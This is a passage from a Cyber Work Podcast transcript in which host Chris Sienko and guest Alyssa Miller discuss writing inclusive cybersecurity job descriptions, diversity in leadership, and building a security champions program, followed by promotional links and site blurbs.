Then if you don't trust me that this works, I've got a job posting out there right now in the process of hiring for. This was my strategy was I wanted to make the job description as inviting as possible to encourage people to apply. In less than a week, I had 80 qualified candidates for this job. Don't tell me you can't find cybersecurity people. They are out there. I'm not even talking about an entry level. Entry level jobs. If I open those up, I get massive numbers. I'm talking about a highly skilled position, because it's a leadership position, so I needed somebody with some of that. Unfortunately, in this case, wasn't able to hire an entry level person.

80 in less than a week. I mean, that tells you something. Because they see a job description that says, “Hey, that you want to come work here. You want. You may not feel you have all the skills, but here's why you would fit in this job.” Put that stuff in there. Tell them why those things that maybe they're not thinking about, make them qualified. Rather than telling them, well, you need to have five years of experience working and writing queries in Splunk. If you haven't done that, eh.

[00:48:12] CS: We don’t want to talk to you.

[00:48:13] AM: It doesn't get us anywhere.

[00:48:15] CS: Can you walk through some of the ways that you wrote that description, that inverted that?

[00:48:21] AM: Yeah. One of the big ones and I learned this from a previous description, where I talked to the people I hired after the fact is just pay attention to your job title. A lot of us, not all of us, but a lot of us, especially if we're not in the government, DOD, government stuff, that's all very different. They’re a little stricter on this. A lot of us have the ability to put a different business title than the HR title. I hired two people who are both associate directors, but I listed the job as a lead of application security. Why? Because the minute you put associate director and they see the word director, there's a lot of people who immediately run away from that. Goes, “Oh, I'm not qualified for that.”

Now, I describe the role exactly as it was. The other thing I did was I focused on what are the transferable skills that they might have from a different job, maybe not even tech related, that would fit. In the narrative of the job, what it was going to do, a big paragraph, or two or three at the top, describe that. Do you have this, this, this? Do you work well? Do you do these things? If so, I want you thing, kind of thing, right? That's the thing that says, okay, that connects with them.

Like, oh, hey, I don't necessarily have all these weird technical things. They're saying they want someone who's done this. I did that when I was – My favorite metaphor is when I was a barista at Starbucks. There's some really cool stuff that baristas at coffee shops have to do that really have applicability –

[00:49:56] CS: Translates really well. Yeah.

[00:49:59] AM: I mean, I built a whole TEDx Talk out of it. It was something valid there.

[00:50:03] CS: All right, everybody go. That's your next assignment. Go check out the TED Talk from Alyssa Miller here. Yeah, that's awesome. Thank you for breaking that down. This episode will likely, we were talking about we didn't know when it’s going to drop. It'll probably drop in June. Probably dropped during pride month. The phrase, we are committed to diversity and inclusion, as often said on corporate websites, and sometimes only in June could stand to be picked apart. What does an industry truly passionate about diversity and inclusion look like? How do we move towards that with actual momentum, instead of playing catch up from the 11 months where we weren't thinking about it?

[00:50:40] AM: Oh, my God. We could do a whole other show on this.

[00:50:43] CS: Sure.

[00:50:45] AM: You want to know if a company actually believes in that, start with our leadership page. I've just been doing some last couple of weeks, because I've been having a lot of meetings with a lot of vendors. Before going into every one of those meetings, the very first thing I did was look at their leadership page. I will tell you with multiples, where they had a very monochromatic leadership team. That was something I brought up in the discussion.

I wish more people would do that, because – and here's what I tell them. If you cannot see the value that a diverse leadership team has in terms of business value, why that makes your company stronger, more profitable, everything else, then I don't trust you as a business. Because there is real business value. We don't do diversity just because it's nice, or it's right. I mean, those are very good reasons. We do it, because there is business value there. It actually makes our business stronger. It's demonstrated over and over again in studies.

The attempted counter I hear to this a lot is well, we need diversity of thought. Okay, if you don't get diversity of thought, if you're not getting the diversity of experiences that come from different races, different genders, different sexual orientations, all of those –

[00:52:01] CS: Narrative urgencies.

[00:52:03] AM: People who are neuro-diverse, all of it. All of those different aspects we can think of that play into that. Okay. If you're not bringing those people in, in the mix, you can't say you have diversity of thought. Five old white men in a room are not giving you diversity of thought. I don't care how much they're experienced. They've not been through the same things as –

[00:52:33] CS: Also, diversity of thought. I mean, I think that even goes higher on the list than security is everyone's business as a shut conversation down phrase.

[00:52:41] AM: Yes. Oh, it totally is. It's a total attempt to shut down the argument.

[00:52:44] CS: All I hear is stop talking about this. Please.

[00:52:50] AM: So yeah.

[00:52:51] CS: Yup. All right. As we wrap up today, we talked a bit about the book upfront. If you want to talk about any other projects that you have on the horizon that you'd like us to know about, or other cool things you're doing or whatever, tell us about it now.

[00:53:07] AM: Honestly, I don't know of anything in particular at the moment. I mean, I'm doing some cool stuff with, we're building out a security champions program. I'm really hoping that that's going to turn into something very cool here soon. This is going to air after RSA. I'm giving a talk in RSA. I mean, I'm really hoping that the team I have assembled to work on the security champions program, we're going to come up with something really awesome. I'm already seing some really, really creative and cool work.

I do hope in the longer term that I can even turn that into maybe some commentary on best practices and things. Because I did ask them to make a little bit of a departure from what we traditionally think of as security champions, where a lot of times it's all about training and stuff. We're definitely looking a lot broader than that. I know there's some organizations out there that have great security champions programs.

[00:54:06] CS: Yeah. Could you expand on that a little bit without giving all the tipping point?

[00:54:09] AM: Yeah. Basically, we're talking about embedding cybersecurity expertise in your engineering teams, your product teams, your operations and SRE teams, etc., etc. Developing that as its own community of people where they interact and they operate as a community of security champions, and then they go back. They're still developers. They're not cybersecurity people. They're still developers. They're still engineers. They're still working in those teams in that job capacity, but now they have that increased awareness and skill set around cybersecurity. That knowledge is now in the team, and that starts to build a true culture of what a colleague of mine calls a security empowered culture. Thank you, Jules [inaudible 00:54:59] for that, because I love that term. I told her, I was going to steal it from her.

[00:55:05] CS: Now here we are.

[00:55:06] AM: Use it with credit.

[00:55:08] CS: Yes, absolutely.

[00:55:09] AM: It’s a great term and I love it.

[00:55:12] CS: That's awesome. One last question. You gave that link up before for the book. If our listeners want to learn more about Alyssa Miller, where should they go online?

[00:55:21] AM: Twitter is easy, if you really want to learn about me, because I am for some reason really wide open about my life on Twitter. My website, I would love to say, go to my website, and you should, but I'm not great with keeping it up. I'm not going to lie. I blog every so often. That is alyssasec.com.

[00:55:49] CS: The book link again was – was it alyssa.link or alyssamiller.link/book?

[00:55:53] AM: It’s alyssa.link/book. It will you to take Manning’s site, where if you do it, I mean, the book is going to be out now by the time this comes out. As of today, yet, if you go and even start reading it before the book’s available, e-book and physical book are as of this, actually airing is going to be available. I definitely encourage people to take a look. Also, let me know what you think. If things I missed, or things you wish I would have included that I didn't. I wouldn't shock me if at some point down the road, we do a second edition and update it with some of that stuff.

[00:56:30] CS: Cool. Maybe I'll have you back on and I'll do a book report on what I learned from it, if you want to be on third time. Alyssa, thank you so much for your time and insights. It's always such a pleasure to talk to you.

[00:56:41] AM: Yeah, same here. I really appreciate it. Thanks for the time today, Chris.

[00:56:44] CS: As always, I'd like to thank everyone who is listening to and supporting Cyber Work. We've just about doubled our subscriptions in the last six months and we really appreciate all the people who are very excited to talk to us about this stuff. New episodes of the Cyber Work Podcast, as always, are available every Monday at 1 pm Central, both on video at our YouTube page and on audio wherever you get your podcasts. As always, if you want to learn cybersecurity for free, we have a platform on our InfoSec skills, where you can go, infosecinstitute.com/free. You can get 10 free cybersecurity foundation courses from Keatron Evans, six cybersecurity leadership courses from Cicero Chimbanda. 11 courses on digital forensics, 11 on incident response, seven on security architecture, plus DevSecOps. Hello. Python for cybersecurity, JavaScript security, ICS and SCADA security fundamentals and more. Just go to infosecinstitute.com/free and start learning today.

Thank you once again to Alyssa Miller and thank you all so much for watching and listening. We'll speak to you next week.

[END]

How does your salary stack up?

Ever wonder how much a career in cybersecurity pays? We crunched the numbers for the most popular roles and certifications. Download the 2024 Cybersecurity Salary Guide to learn more.

placeholder

Weekly career advice

Learn how to break into cybersecurity, build new skills and move up the career ladder. Each week on the Cyber Work Podcast, host Chris Sienko sits down with thought leaders from Booz Allen Hamilton, CompTIA, Google, IBM, Veracode and others to discuss the latest cybersecurity workforce trends.

placeholder

Q&As with industry pros

Have a question about your cybersecurity career? Join our special Cyber Work Live episodes for a Q&A with industry leaders. Get your career questions answered, connect with other industry professionals and take your career to the next level.

placeholder

Level up your skills

Hack your way to success with career tips from cybersecurity experts. Get concise, actionable advice in each episode — from acing your first certification exam to building a world-class enterprise cybersecurity culture.